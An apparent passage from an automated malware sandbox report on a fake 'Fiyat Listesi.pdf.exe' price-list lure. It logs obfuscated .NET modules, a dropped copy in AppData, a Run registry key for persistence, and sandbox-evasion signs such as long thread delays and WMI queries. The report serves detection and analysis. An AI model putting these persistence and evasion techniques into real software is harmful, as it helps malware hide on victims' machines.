                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, GfC7QCCjIwYVW1JcP5.cs | High entropy of concatenated method names: 'EoKkdVC7RB', 'NmmknX6cj9', 'FG8kAYvGag', 'nygkpFFDc2', 'hRhkDcfKOt', 'HTbks8qmcC', 'tkGkyWku91', 'Qo2kCygMrs', 'So5ki65NWO', 'FqQkbvOKYK'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, AsGyZCzgTMR4SKARrf.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Epk4HbW4Dy', 'Veb4SGfuQh', 'cFb4WRXuxt', 'rrP4Ik2nUC', 'ly74fQWhpl', 'UHx44JHaiO', 'fMZ4clw8L2'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, vdlm9AVEXIdJgIbOd8.cs | High entropy of concatenated method names: 'p5IfnUhXrw', 'QZ7fAGQvEg', 'TJnfpTRde4', 't87fDqNciJ', 'ryMfshVBAf', 'PrWfyJtjGY', 'Wr3fC4HDoK', 'PsFfi9Sx6S', 'wQVfbULxr4', 'Hbnf8vSvfA'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, Pr610lZQJPnBqVUMpg.cs | High entropy of concatenated method names: 'u6bmUGdW5iu2xMOghvW', 'FnnivgdXLPWMaSNOoKA', 'ckysfiXw2J', 'm3Qs4jbwqq', 'IX9sc6vmcf', 'x6GWgtdy4b4o5SaFZM9', 'kCTBDDdeykJEvDTa5Zf'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, RpNtdwGk4mtG5ISUjB4.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JE1cUipZAs', 'u6ecoPw8jl', 'OuhcO4DT33', 'DHQc5bG0p6', 'juccqO8PC2', 'pQEcj2NMkB', 'mqxc3ulSM6'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, Y7pkh21m9KcTRqOks4.cs | High entropy of concatenated method names: 'xsHHv04ykA', 'bWbHXSvlAs', 'L0KHM91JQR', 'VoHHZNqTEM', 'VVQHlQnjT2', 'yIJH2uAuLh', 'cbFH03AjoQ', 'HV3HPYO0wt', 'WNaHtxhkTg', 'sq8H7VZpBG'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, kUfAZeXkYTCn5qOeSR.cs | High entropy of concatenated method names: 'th9pYBetSL', 'UnYpxDhxlU', 'WZQpvcW6QP', 'D7IpXjj572', 'hq4pSyW3en', 'xCvpW6FXe4', 'H0qpIQNEX6', 'zskpfWeh81', 'f8fp4J5g93', 'W5EpchMyAD'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, pIOXZfAUCI1NJ36aoD.cs | High entropy of concatenated method names: 'Dispose', 'AgGGuslF2S', 'OEsTZxrloq', 'GnMZZZdAy3', 'nedGFlm9AE', 'EIdGzJgIbO', 'ProcessDialogKey', 'e8ATBuJ1oY', 'm7ZTG4qheE', 'i6fTThDw2E'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, HZbm2yOY3UJaCfctBW.cs | High entropy of concatenated method names: 'ToString', 'FD1W7lvgUD', 'VdNWZWoZOx', 'wgHWQGt9nO', 'xHnWl6OR2l', 'eJwW2ugL6q', 'nkqWK4PkDA', 'SkfW091axX', 'RnuWPdhNFB', 'Sa3WmMhRYF'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, zwVVUIKidr6EYTWQLK.cs | High entropy of concatenated method names: 'Br8sO5wCwg', 'nNTs5YG5kZ', 'WDYsqwt09N', 'ToString', 'DbssjlHLmJ', 'PbKs3gaTt7', 'IigwyqdbK72KaQIMOS4', 'BQOY2SduD6b7NHUCRBv', 'daiFtQdhjhBWBM0qhBF', 'q6H9mddL7w3QE0NFkcK'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, Np44hRR4WowCbwIcW3.cs | High entropy of concatenated method names: 'QqyGyvk3pj', 'jguGCvOKtN', 'vkYGbTCn5q', 'SeSG8Rv4BE', 'mLmGSAcwlj', 'i6fGW5f28c', 'U3ZVbX0dhCY4Qt0YnC', 'Y14lCnOh8N2bTHZbxP', 'CMxGGGqoWR', 'LEOGk8ZVRx'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, jvk3pjvyguvOKtNTem.cs | High entropy of concatenated method names: 'NYCAURke99', 'qGPAoxJvSy', 'nJbAO8BMwv', 'rkKA5EV0RC', 'jj1AqjRIsE', 'Vs3Ajl0QF0', 'dAPA3IHJ9v', 'S6AAV1u8bw', 'DnwAu3Yd2M', 'PZfAFm82lj'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, TmcsV7GBseGiKp8xPE5.cs | High entropy of concatenated method names: 'jmM4EPULpy', 'oKv4gPk6YE', 'Vuq4LFhyH9', 'Nc64YcjXNY', 'XOk4rxg9qp', 'YPk4xot3xS', 'UbT4aMSayQ', 'EJt4vRLqMF', 'QlF4XmwiP6', 'Dad49Go9Sq'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, tljs6fM5f28cZZv0ys.cs | High entropy of concatenated method names: 'JeisdRVj72', 'mCtsAT5Mne', 'GP0sDDJlnO', 'fyCsys5Kcs', 'o7ysCBU5r8', 'B3ADqHVExT', 'YqeDjtK71W', 'kYlD3nnUXM', 'MtYDVJTINc', 'KuSDur8C1L'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, nm7U2gjKQs5pqglCSj.cs | High entropy of concatenated method names: 'AIpIVGqPab', 'fWFIFVQg6i', 'crlfBYyXPl', 'LX3fGOq6uy', 'hfwI7reEcV', 'V8UIN9sphB', 'NS3I1KTKDu', 'QtvIUAuCwG', 'IqZIoSW5xM', 'P5RIOoXpR9'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, YibXPc0SHogQCZdwwV.cs | High entropy of concatenated method names: 'kFJynULVRv', 'Ae0yp6CGYi', 'L9Aysf8gmx', 'ESHsF4DoNA', 'XRXszE7Enh', 'rw1yBtkoF6', 'PM1yGTvdxF', 'ufTyTBUmFw', 'Cfxyk8y2aT', 'vYoyRGDnyO'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, zOV4n5T1q7gMf0ZNoO.cs | High entropy of concatenated method names: 'TDMLRxSlq', 'IPvYNAV0R', 'D5Yxr0vW6', 'eJeaii2tO', 'htIXKxNWl', 'QHd9X4hgB', 'VSty5dgafHJBLGQcDs', 'L9ZxrgkI2c4FOwgPyl', 'zag43uC14kqjIt9Hwi', 'Co7fEAgqS'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, xDw2ELFt4Xo5vfTyeF.cs | High entropy of concatenated method names: 'FJj4GgtrdP', 'Bou4kRb3ef', 'B1J4RDrXgk', 'TyY4nWlJew', 'RyY4A8sS0o', 'uhm4DcfChL', 'vtL4sOaOLM', 'XFnf3JAIlx', 'tApfVjgH7e', 'UBkfud9Axl'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, D4BEQu9Cihv1XbLmAc.cs | High entropy of concatenated method names: 'FZdDrgGrF7', 'qruDaEhtPu', 'eahpQE9AZw', 'USiplJGyD3', 'YRxp2IdlQs', 'zfqpKdFH5u', 'pbNp0lWCqD', 'TdnpPeSvXA', 'WvnpmZ6IHy', 'yMoptgwLHb'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, ixuyA3mZZVVGTgDOSP.cs | High entropy of concatenated method names: 'FuNyE6tpgX', 'XmNygceMv8', 'Gg2yLjCvJD', 'tk7yYglUrr', 'XBcyruOq2X', 'L11yxDPIj9', 'L1AyaXXYo9', 'x1Uyvsi6h7', 'aVyyXMxD0L', 'ruXy98ek8n'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, fuJ1oYu87Z4qheEs6f.cs | High entropy of concatenated method names: 'yi5fMMvFXp', 'X6NfZ8RsrQ', 'ppYfQmBWhQ', 'YuZflyYdZN', 'b0OfUA24Aw', 'o3Sf22AxRX', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, GfC7QCCjIwYVW1JcP5.cs | High entropy of concatenated method names: 'EoKkdVC7RB', 'NmmknX6cj9', 'FG8kAYvGag', 'nygkpFFDc2', 'hRhkDcfKOt', 'HTbks8qmcC', 'tkGkyWku91', 'Qo2kCygMrs', 'So5ki65NWO', 'FqQkbvOKYK'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.5c10000.5.raw.unpack, JK.cs | High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.33ce948.1.raw.unpack, JK.cs | High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | File created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctsdvwT (2 identical entries)

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | File opened: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 identical entries)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 identical entries)
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Process information set: NOOPENFILEERRORBOX (45 identical entries)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe  Process information set: NOOPENFILEERRORBOX  (53 identical entries)
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe  Process information set: NOOPENFILEERRORBOX  (99 identical entries)
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: Yara match | File source: Process Memory Space: 26.09 01.10.2024Fiyat Listesi.pdf.exe PID: 7620, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: ctsdvwT.exe PID: 8136, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Memory allocated: 3180000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Memory allocated: 3390000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Memory allocated: 8550000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Memory allocated: 9550000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Memory allocated: 9710000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Memory allocated: A710000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Memory allocated: E30000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Memory allocated: 2990000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Memory allocated: 4990000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory allocated: 1420000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory allocated: 3110000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory allocated: 16B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory allocated: 7D20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory allocated: 8D20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory allocated: 8EC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory allocated: 9EC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory allocated: 2F60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory allocated: 3170000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory allocated: 2FC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory allocated: FC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory allocated: 2CD0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory allocated: 2B60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory allocated: 7870000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory allocated: 8870000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory allocated: 8A10000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory allocated: 9A10000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory allocated: 1390000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory allocated: 2F20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory allocated: 2E20000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2400000
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2399883
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2399765
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2399638
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2399531
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2399422
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2399312
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2399203
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2399094
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2398984
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2398874
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2398765
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2398663
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2398547
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2398393
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2398161
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2398031
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2397921
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2397812
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2397703
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2397594
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2397484
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2397375
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2397264
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2397156
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2397046
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2396937
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2396828
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2396718
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2396609
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2396500
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2396390
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2396281
